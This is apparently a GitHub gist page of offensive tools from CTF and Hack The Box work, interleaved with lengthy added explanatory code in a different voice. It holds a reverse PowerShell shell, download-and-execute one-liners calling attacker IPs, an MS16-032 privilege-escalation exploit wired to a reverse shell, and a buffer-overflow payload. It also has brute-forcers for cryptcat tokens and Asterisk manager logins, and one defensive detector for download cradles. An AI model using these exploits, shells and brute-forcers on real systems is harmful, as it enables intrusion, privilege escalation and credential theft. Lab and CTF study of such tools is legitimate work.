intrd
💭 Things do not change, we change (silently).
@intrd
intrd / Invoke-PowerShellTcp.ps1
Created November 16, 2017 18:38
Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
#Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
@intrd
intrd / powershell_download_exec.ps1
Last active November 19, 2021 12:29
Powershell download & execute (anyver)
# Powershell download & execute (anyver)
# http://dann.com.br/
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626
powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002
@intrd
intrd / casino2.py
Created October 24, 2017 14:19
casino 2 - prog150 @ hackaflag 2017 - porto alegre
#!/usr/bin/python
## casino 2 - prog150 @ hackaflag 2017 - porto alegre
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / cry_t0k3n_brute.py
Last active September 21, 2017 10:51
Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
## Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import sys,Queue,threading,hashlib,os,time
from subprocess import Popen, PIPE, STDOUT
NumOfThreads=5
queue = Queue.Queue()
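The gist above drives cryptcat through Popen from a pool of five threads fed by a Queue. As an added example (not intrd's code), here is that worker-pool pattern written for Python 3 with the cryptcat round trip replaced by a constructed local oracle (a SHA-256 comparison against a made-up 3-character token), so it runs offline; the token, alphabet and thread count are assumptions for the demo.

```python
# Added example, not from intrd's gist: queue-driven multithreaded brute force.
import hashlib
import itertools
import queue
import string
import threading

# Constructed oracle: SECRET_TOKEN stands in for the cryptcat shared key; only
# its SHA-256 is consulted, so the search below is a genuine brute force.
SECRET_TOKEN = "k3y"
TARGET_DIGEST = hashlib.sha256(SECRET_TOKEN.encode()).hexdigest()


def local_oracle(candidate):
    """Stand-in for one cryptcat round trip: True iff the candidate is the key."""
    return hashlib.sha256(candidate.encode()).hexdigest() == TARGET_DIGEST


def candidate_tokens(length, alphabet=string.ascii_lowercase + string.digits):
    """Lazily enumerate every token of the given length over the alphabet."""
    for combo in itertools.product(alphabet, repeat=length):
        yield "".join(combo)


def brute_force(candidates, oracle, num_threads=5):
    """Feed candidates to num_threads workers; stop enqueuing on the first hit.

    Returns the matching candidate, or None when the keyspace is exhausted.
    """
    # Bounded queue: back-pressure on the producer instead of materialising
    # the whole keyspace in memory.
    q = queue.Queue(maxsize=num_threads * 64)
    found = threading.Event()
    hits = []
    sentinel = object()

    def worker():
        while True:
            item = q.get()
            if item is sentinel:
                return
            # After a hit, keep draining so the producer is never stuck on put().
            if not found.is_set() and oracle(item):
                hits.append(item)
                found.set()

    threads = [threading.Thread(target=worker, daemon=True) for _ in range(num_threads)]
    for t in threads:
        t.start()
    for cand in candidates:
        if found.is_set():
            break
        q.put(cand)
    for _ in threads:          # one sentinel per worker shuts the pool down
        q.put(sentinel)
    for t in threads:
        t.join()
    return hits[0] if hits else None


if __name__ == "__main__":
    print(brute_force(candidate_tokens(3), local_oracle))  # k3y
```

Against a real target the oracle is the slow part (a subprocess or a network round trip per guess), which is exactly where the thread pool pays off; the sentinel-per-worker shutdown and the drain-after-hit rule are what keep the producer from deadlocking on a bounded queue once a worker finds the key.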
@intrd
intrd / sneaky_priv_esc_xpl.py
Last active April 14, 2018 18:35
Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
#!/usr/bin/python
## Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
# @author intrd - http://dann.com.br/
import struct
exploit = "A"*362
#exploit += struct.pack("I",0xffffd638+10) #topstack local
#exploit += "\xCC"*4
exploit += struct.pack("I",0xbffff6e8+10) #topstack remote
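The exploit above is a classic ret2stack layout: 362 bytes of padding, a return address pointing 10 bytes past the stack top, then (in the part of the gist not shown here) a NOP sled and shellcode. As an added example that is not intrd's exploit, the builder below assembles that layout and adds the two checks a practitioner wants before firing it: that the chosen return address actually lands inside the sled, and that the payload contains no bytes a string copy would truncate on. The padding length and the 0xbffff6e8 stack top are taken from the gist; treating that address as the sled start, the 32-byte sled length and the INT3 placeholder shellcode are assumptions for the demo.

```python
# Added example, not from intrd's gist: ret2stack payload builder with checks.
import struct


def build_ret2stack(padding_len, ret_addr, sled_len, shellcode):
    """padding | return address (32-bit little-endian) | NOP sled | shellcode."""
    payload = b"A" * padding_len
    # "<I" pins little-endian 32-bit. The gist's bare "I" is native order and
    # size, which only matches the target when the exploit runs on 32-bit x86.
    payload += struct.pack("<I", ret_addr)
    payload += b"\x90" * sled_len
    payload += shellcode
    return payload


def ret_hits_sled(sled_start, sled_len, ret_addr):
    """True when execution resumes inside the sled.

    sled_start is the stack address just past the overwritten return slot
    (assumed here to be what the gist calls "topstack"); ret_addr must fall in
    [sled_start, sled_start + sled_len) to slide into the shellcode.
    """
    return sled_start <= ret_addr < sled_start + sled_len


def find_bad_bytes(payload, bad=b"\x00\x0a"):
    """Offsets of bytes that a strcpy-style copy or line-based read would cut on."""
    return [i for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    TOPSTACK = 0xbffff6e8           # "topstack remote" from the gist
    p = build_ret2stack(362, TOPSTACK + 10, 32, b"\xcc" * 4)   # INT3 placeholder shellcode
    print(len(p), p[362:366].hex())                            # 402 f2f6ffbf
    print(ret_hits_sled(TOPSTACK, 32, TOPSTACK + 10))          # True
    print(find_bad_bytes(p))                                   # []
```

The sled check also quantifies the tolerance: with a 32-byte sled and a +10 offset, the remote stack may sit up to 10 bytes higher or 21 bytes lower than measured before the return address misses the sled, which is why the gist keeps separate local and remote addresses.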
@intrd
intrd / powershell_wget_oneliner.ps1
Last active October 16, 2021 11:33
Powershell WGET one-liner (anyver)
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
@intrd
intrd / ghost_disable_google_amp.md
Last active July 4, 2017 15:52
Ghost blogs - fast tip to disable Google AMP

Google AMP is a nuisance; we don't need it breaking our layouts.

Open core/server/config/index.js and remove 'amp' from the internalApps list:

        internalApps: ['private-blogging', 'subscribers', 'amp'],
        slugs: {
            // Used by generateSlug to generate slugs for posts, tags, users, ..
            // reserved slugs are reserved but can be extended/removed by apps
            // protected slugs cannot be changed or removed
            reserved: ['admin', 'app', 'apps', 'archive', 'archives', 'categories',
@intrd
intrd / hackaflag2017-jp_prog300-encoding.py
Last active April 14, 2018 18:35
Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
#!/usr/bin/python
# -*- coding: utf-8 -*-
## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / ms16_032_intrd_mod.ps1
Last active October 16, 2021 11:33
Win7-Win10 & 2k8-2k12 <== 32/64bit privilege escalation (MS16-032 exploit modded) - command argv + reverse shell
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# Run this to exploit MS16-032, get admin and run a command (e.g. the attached shell.ps1): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMMANDHERE"
# To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
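The download-and-execute one-liners in powershell_download_exec.ps1, powershell_wget_oneliner.ps1 and the MS16-032 usage line above all share the same cradle shape (New-Object Net.WebClient, DownloadString/DownloadFile, IEX, -ExecutionPolicy unrestricted/Bypass, an IP-literal URL). As an added example from the defender's side, not code from any of the gists, the scorer below flags those indicators in process command-line telemetry (Sysmon Event ID 1 or Security 4688). The sample lines are constructed: three copy the gists' own command lines, two are benign for contrast; the weights and the threshold of 6 are assumptions to be tuned per environment.

```python
# Added example, not from intrd's gists: PowerShell download-cradle scoring.
import re

# (name, weight, case-insensitive pattern). Weights are an assumption.
INDICATORS = [
    ("download_cradle",   3, r"\.Download(String|File|Data)\s*\("),
    ("webclient",         2, r"\bNet\.WebClient\b"),
    ("invoke_expression", 2, r"(?<![\w-])(IEX|Invoke-Expression)\b"),
    ("policy_bypass",     2, r"-Exec(utionPolicy)?\s+(Bypass|Unrestricted)\b"),
    ("no_profile",        1, r"-NoP(rofile)?\b"),
    ("ip_literal_url",    2, r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/"),
    ("exe_into_temp",     1, r"\\temp\\[^'\"\s]+\.exe\b"),
]
COMPILED = [(n, w, re.compile(p, re.IGNORECASE)) for n, w, p in INDICATORS]


def score_cradle(cmdline):
    """Return (score, [indicator names]) for one process command line."""
    hits = [n for n, _, rx in COMPILED if rx.search(cmdline)]
    score = sum(w for n, w, _ in COMPILED if n in hits)
    return score, hits


def flag_suspicious(cmdlines, threshold=6):
    """Return [(score, hits, cmdline)] at or above threshold, highest first."""
    flagged = []
    for line in cmdlines:
        score, hits = score_cradle(line)
        if score >= threshold:
            flagged.append((score, hits, line))
    return sorted(flagged, key=lambda t: t[0], reverse=True)


# Constructed sample telemetry: the first three are the gists' command lines,
# the last two are benign admin usage that a naive "WebClient" match would hit.
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002",
    r"@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')",
    r'''IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"''',
    r"powershell.exe -Command (New-Object Net.WebClient).DownloadFile('https://updates.example.com/agent.msi','C:\ProgramData\agent.msi')",
    r"powershell.exe -NoProfile -Command Get-Process",
]


if __name__ == "__main__":
    for score, hits, line in flag_suspicious(SAMPLE_CMDLINES):
        print(score, hits, line[:60] + "...")
```

The MS16-032 line shows why the patterns are searched rather than anchored: the second cradle is nested inside a quoted argument to Invoke-MS16-032, and only an unanchored match sees it. The benign DownloadFile from a hostname scores 5 (cradle plus WebClient) and stays under the threshold; what pushes the gists' lines to 11 or 12 is the combination with IEX, a policy bypass and an IP-literal URL, so tune on the combination, not on any one indicator.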
@intrd
intrd / asterisk_bruteforce.py
Last active June 22, 2017 03:20
Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0); may still work on later versions.
## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0); may still work on later versions.
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Make a copy of this template and adapt to your task!
import sys, time
sys.path.append("libs/")
from int_netcat import Netcat
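The template above brute-forces the raw Asterisk Manager Interface on TCP 5038. As an added example that is not intrd's Nozzlr template, here is the AMI 1.1 login exchange it exercises, with both sides' messages: the client sends a CRLF-delimited "Action: Login" block after the banner and parses the "Response:" block that comes back. The manager end is a constructed mock on a socketpair (credentials, banner text and the one-login-per-connection rule are assumptions for the demo, the last one mirroring Asterisk dropping the session after a failed login); against a real PBX the client side would use socket.create_connection((host, 5038)) in place of mock_connect.

```python
# Added example, not from intrd's template: AMI login exchange and brute force.
import socket
import threading

AMI_BANNER = b"Asterisk Call Manager/1.1\r\n"
MOCK_USER, MOCK_SECRET = "admin", "amp111"      # constructed credentials for the mock


def build_login(username, secret):
    """An AMI action: 'Key: Value' lines, CRLF-separated, ended by a blank line."""
    return f"Action: Login\r\nUsername: {username}\r\nSecret: {secret}\r\n\r\n".encode()


def read_packet(rf):
    """Read one AMI packet (up to the blank line) from a buffered reader into a dict.
    An empty dict means the peer closed before sending anything."""
    headers = {}
    while True:
        line = rf.readline()
        if line in (b"", b"\r\n"):
            return headers
        key, _, value = line.decode(errors="replace").rstrip("\r\n").partition(": ")
        headers[key] = value


def mock_ami_server(conn):
    """Constructed stand-in for the PBX: banner, one Login action, one response."""
    with conn:
        conn.sendall(AMI_BANNER)
        rf = conn.makefile("rb")
        action = read_packet(rf)
        ok = (action.get("Action") == "Login"
              and (action.get("Username"), action.get("Secret")) == (MOCK_USER, MOCK_SECRET))
        if ok:
            conn.sendall(b"Response: Success\r\nMessage: Authentication accepted\r\n\r\n")
            read_packet(rf)      # stay up until the client hangs up
        else:
            conn.sendall(b"Response: Error\r\nMessage: Authentication failed\r\n\r\n")
        rf.close()


def mock_connect():
    """Return the client end of a fresh connection to the mock manager."""
    client_end, server_end = socket.socketpair()
    threading.Thread(target=mock_ami_server, args=(server_end,), daemon=True).start()
    return client_end


def ami_login(sock, username, secret):
    """Perform the login exchange on an open connection; True on 'Response: Success'."""
    rf = sock.makefile("rb")
    banner = rf.readline()                       # e.g. b"Asterisk Call Manager/1.1\r\n"
    if not banner.startswith(b"Asterisk Call Manager/"):
        rf.close()
        return False
    sock.sendall(build_login(username, secret))
    response = read_packet(rf)
    rf.close()
    return response.get("Response") == "Success"


def brute_ami(connect, username, wordlist):
    """One connection per guess (the manager drops failed sessions); return the hit or None."""
    for secret in wordlist:
        sock = connect()
        try:
            if ami_login(sock, username, secret):
                return secret
        finally:
            sock.close()
    return None


if __name__ == "__main__":
    print(brute_ami(mock_connect, "admin", ["1234", "secret", "amp111"]))  # amp111
```

Reconnecting for every guess is the part worth copying: because a real manager closes the session on a failed login, a brute-forcer that reuses one socket silently reads EOF after the first miss and reports nothing.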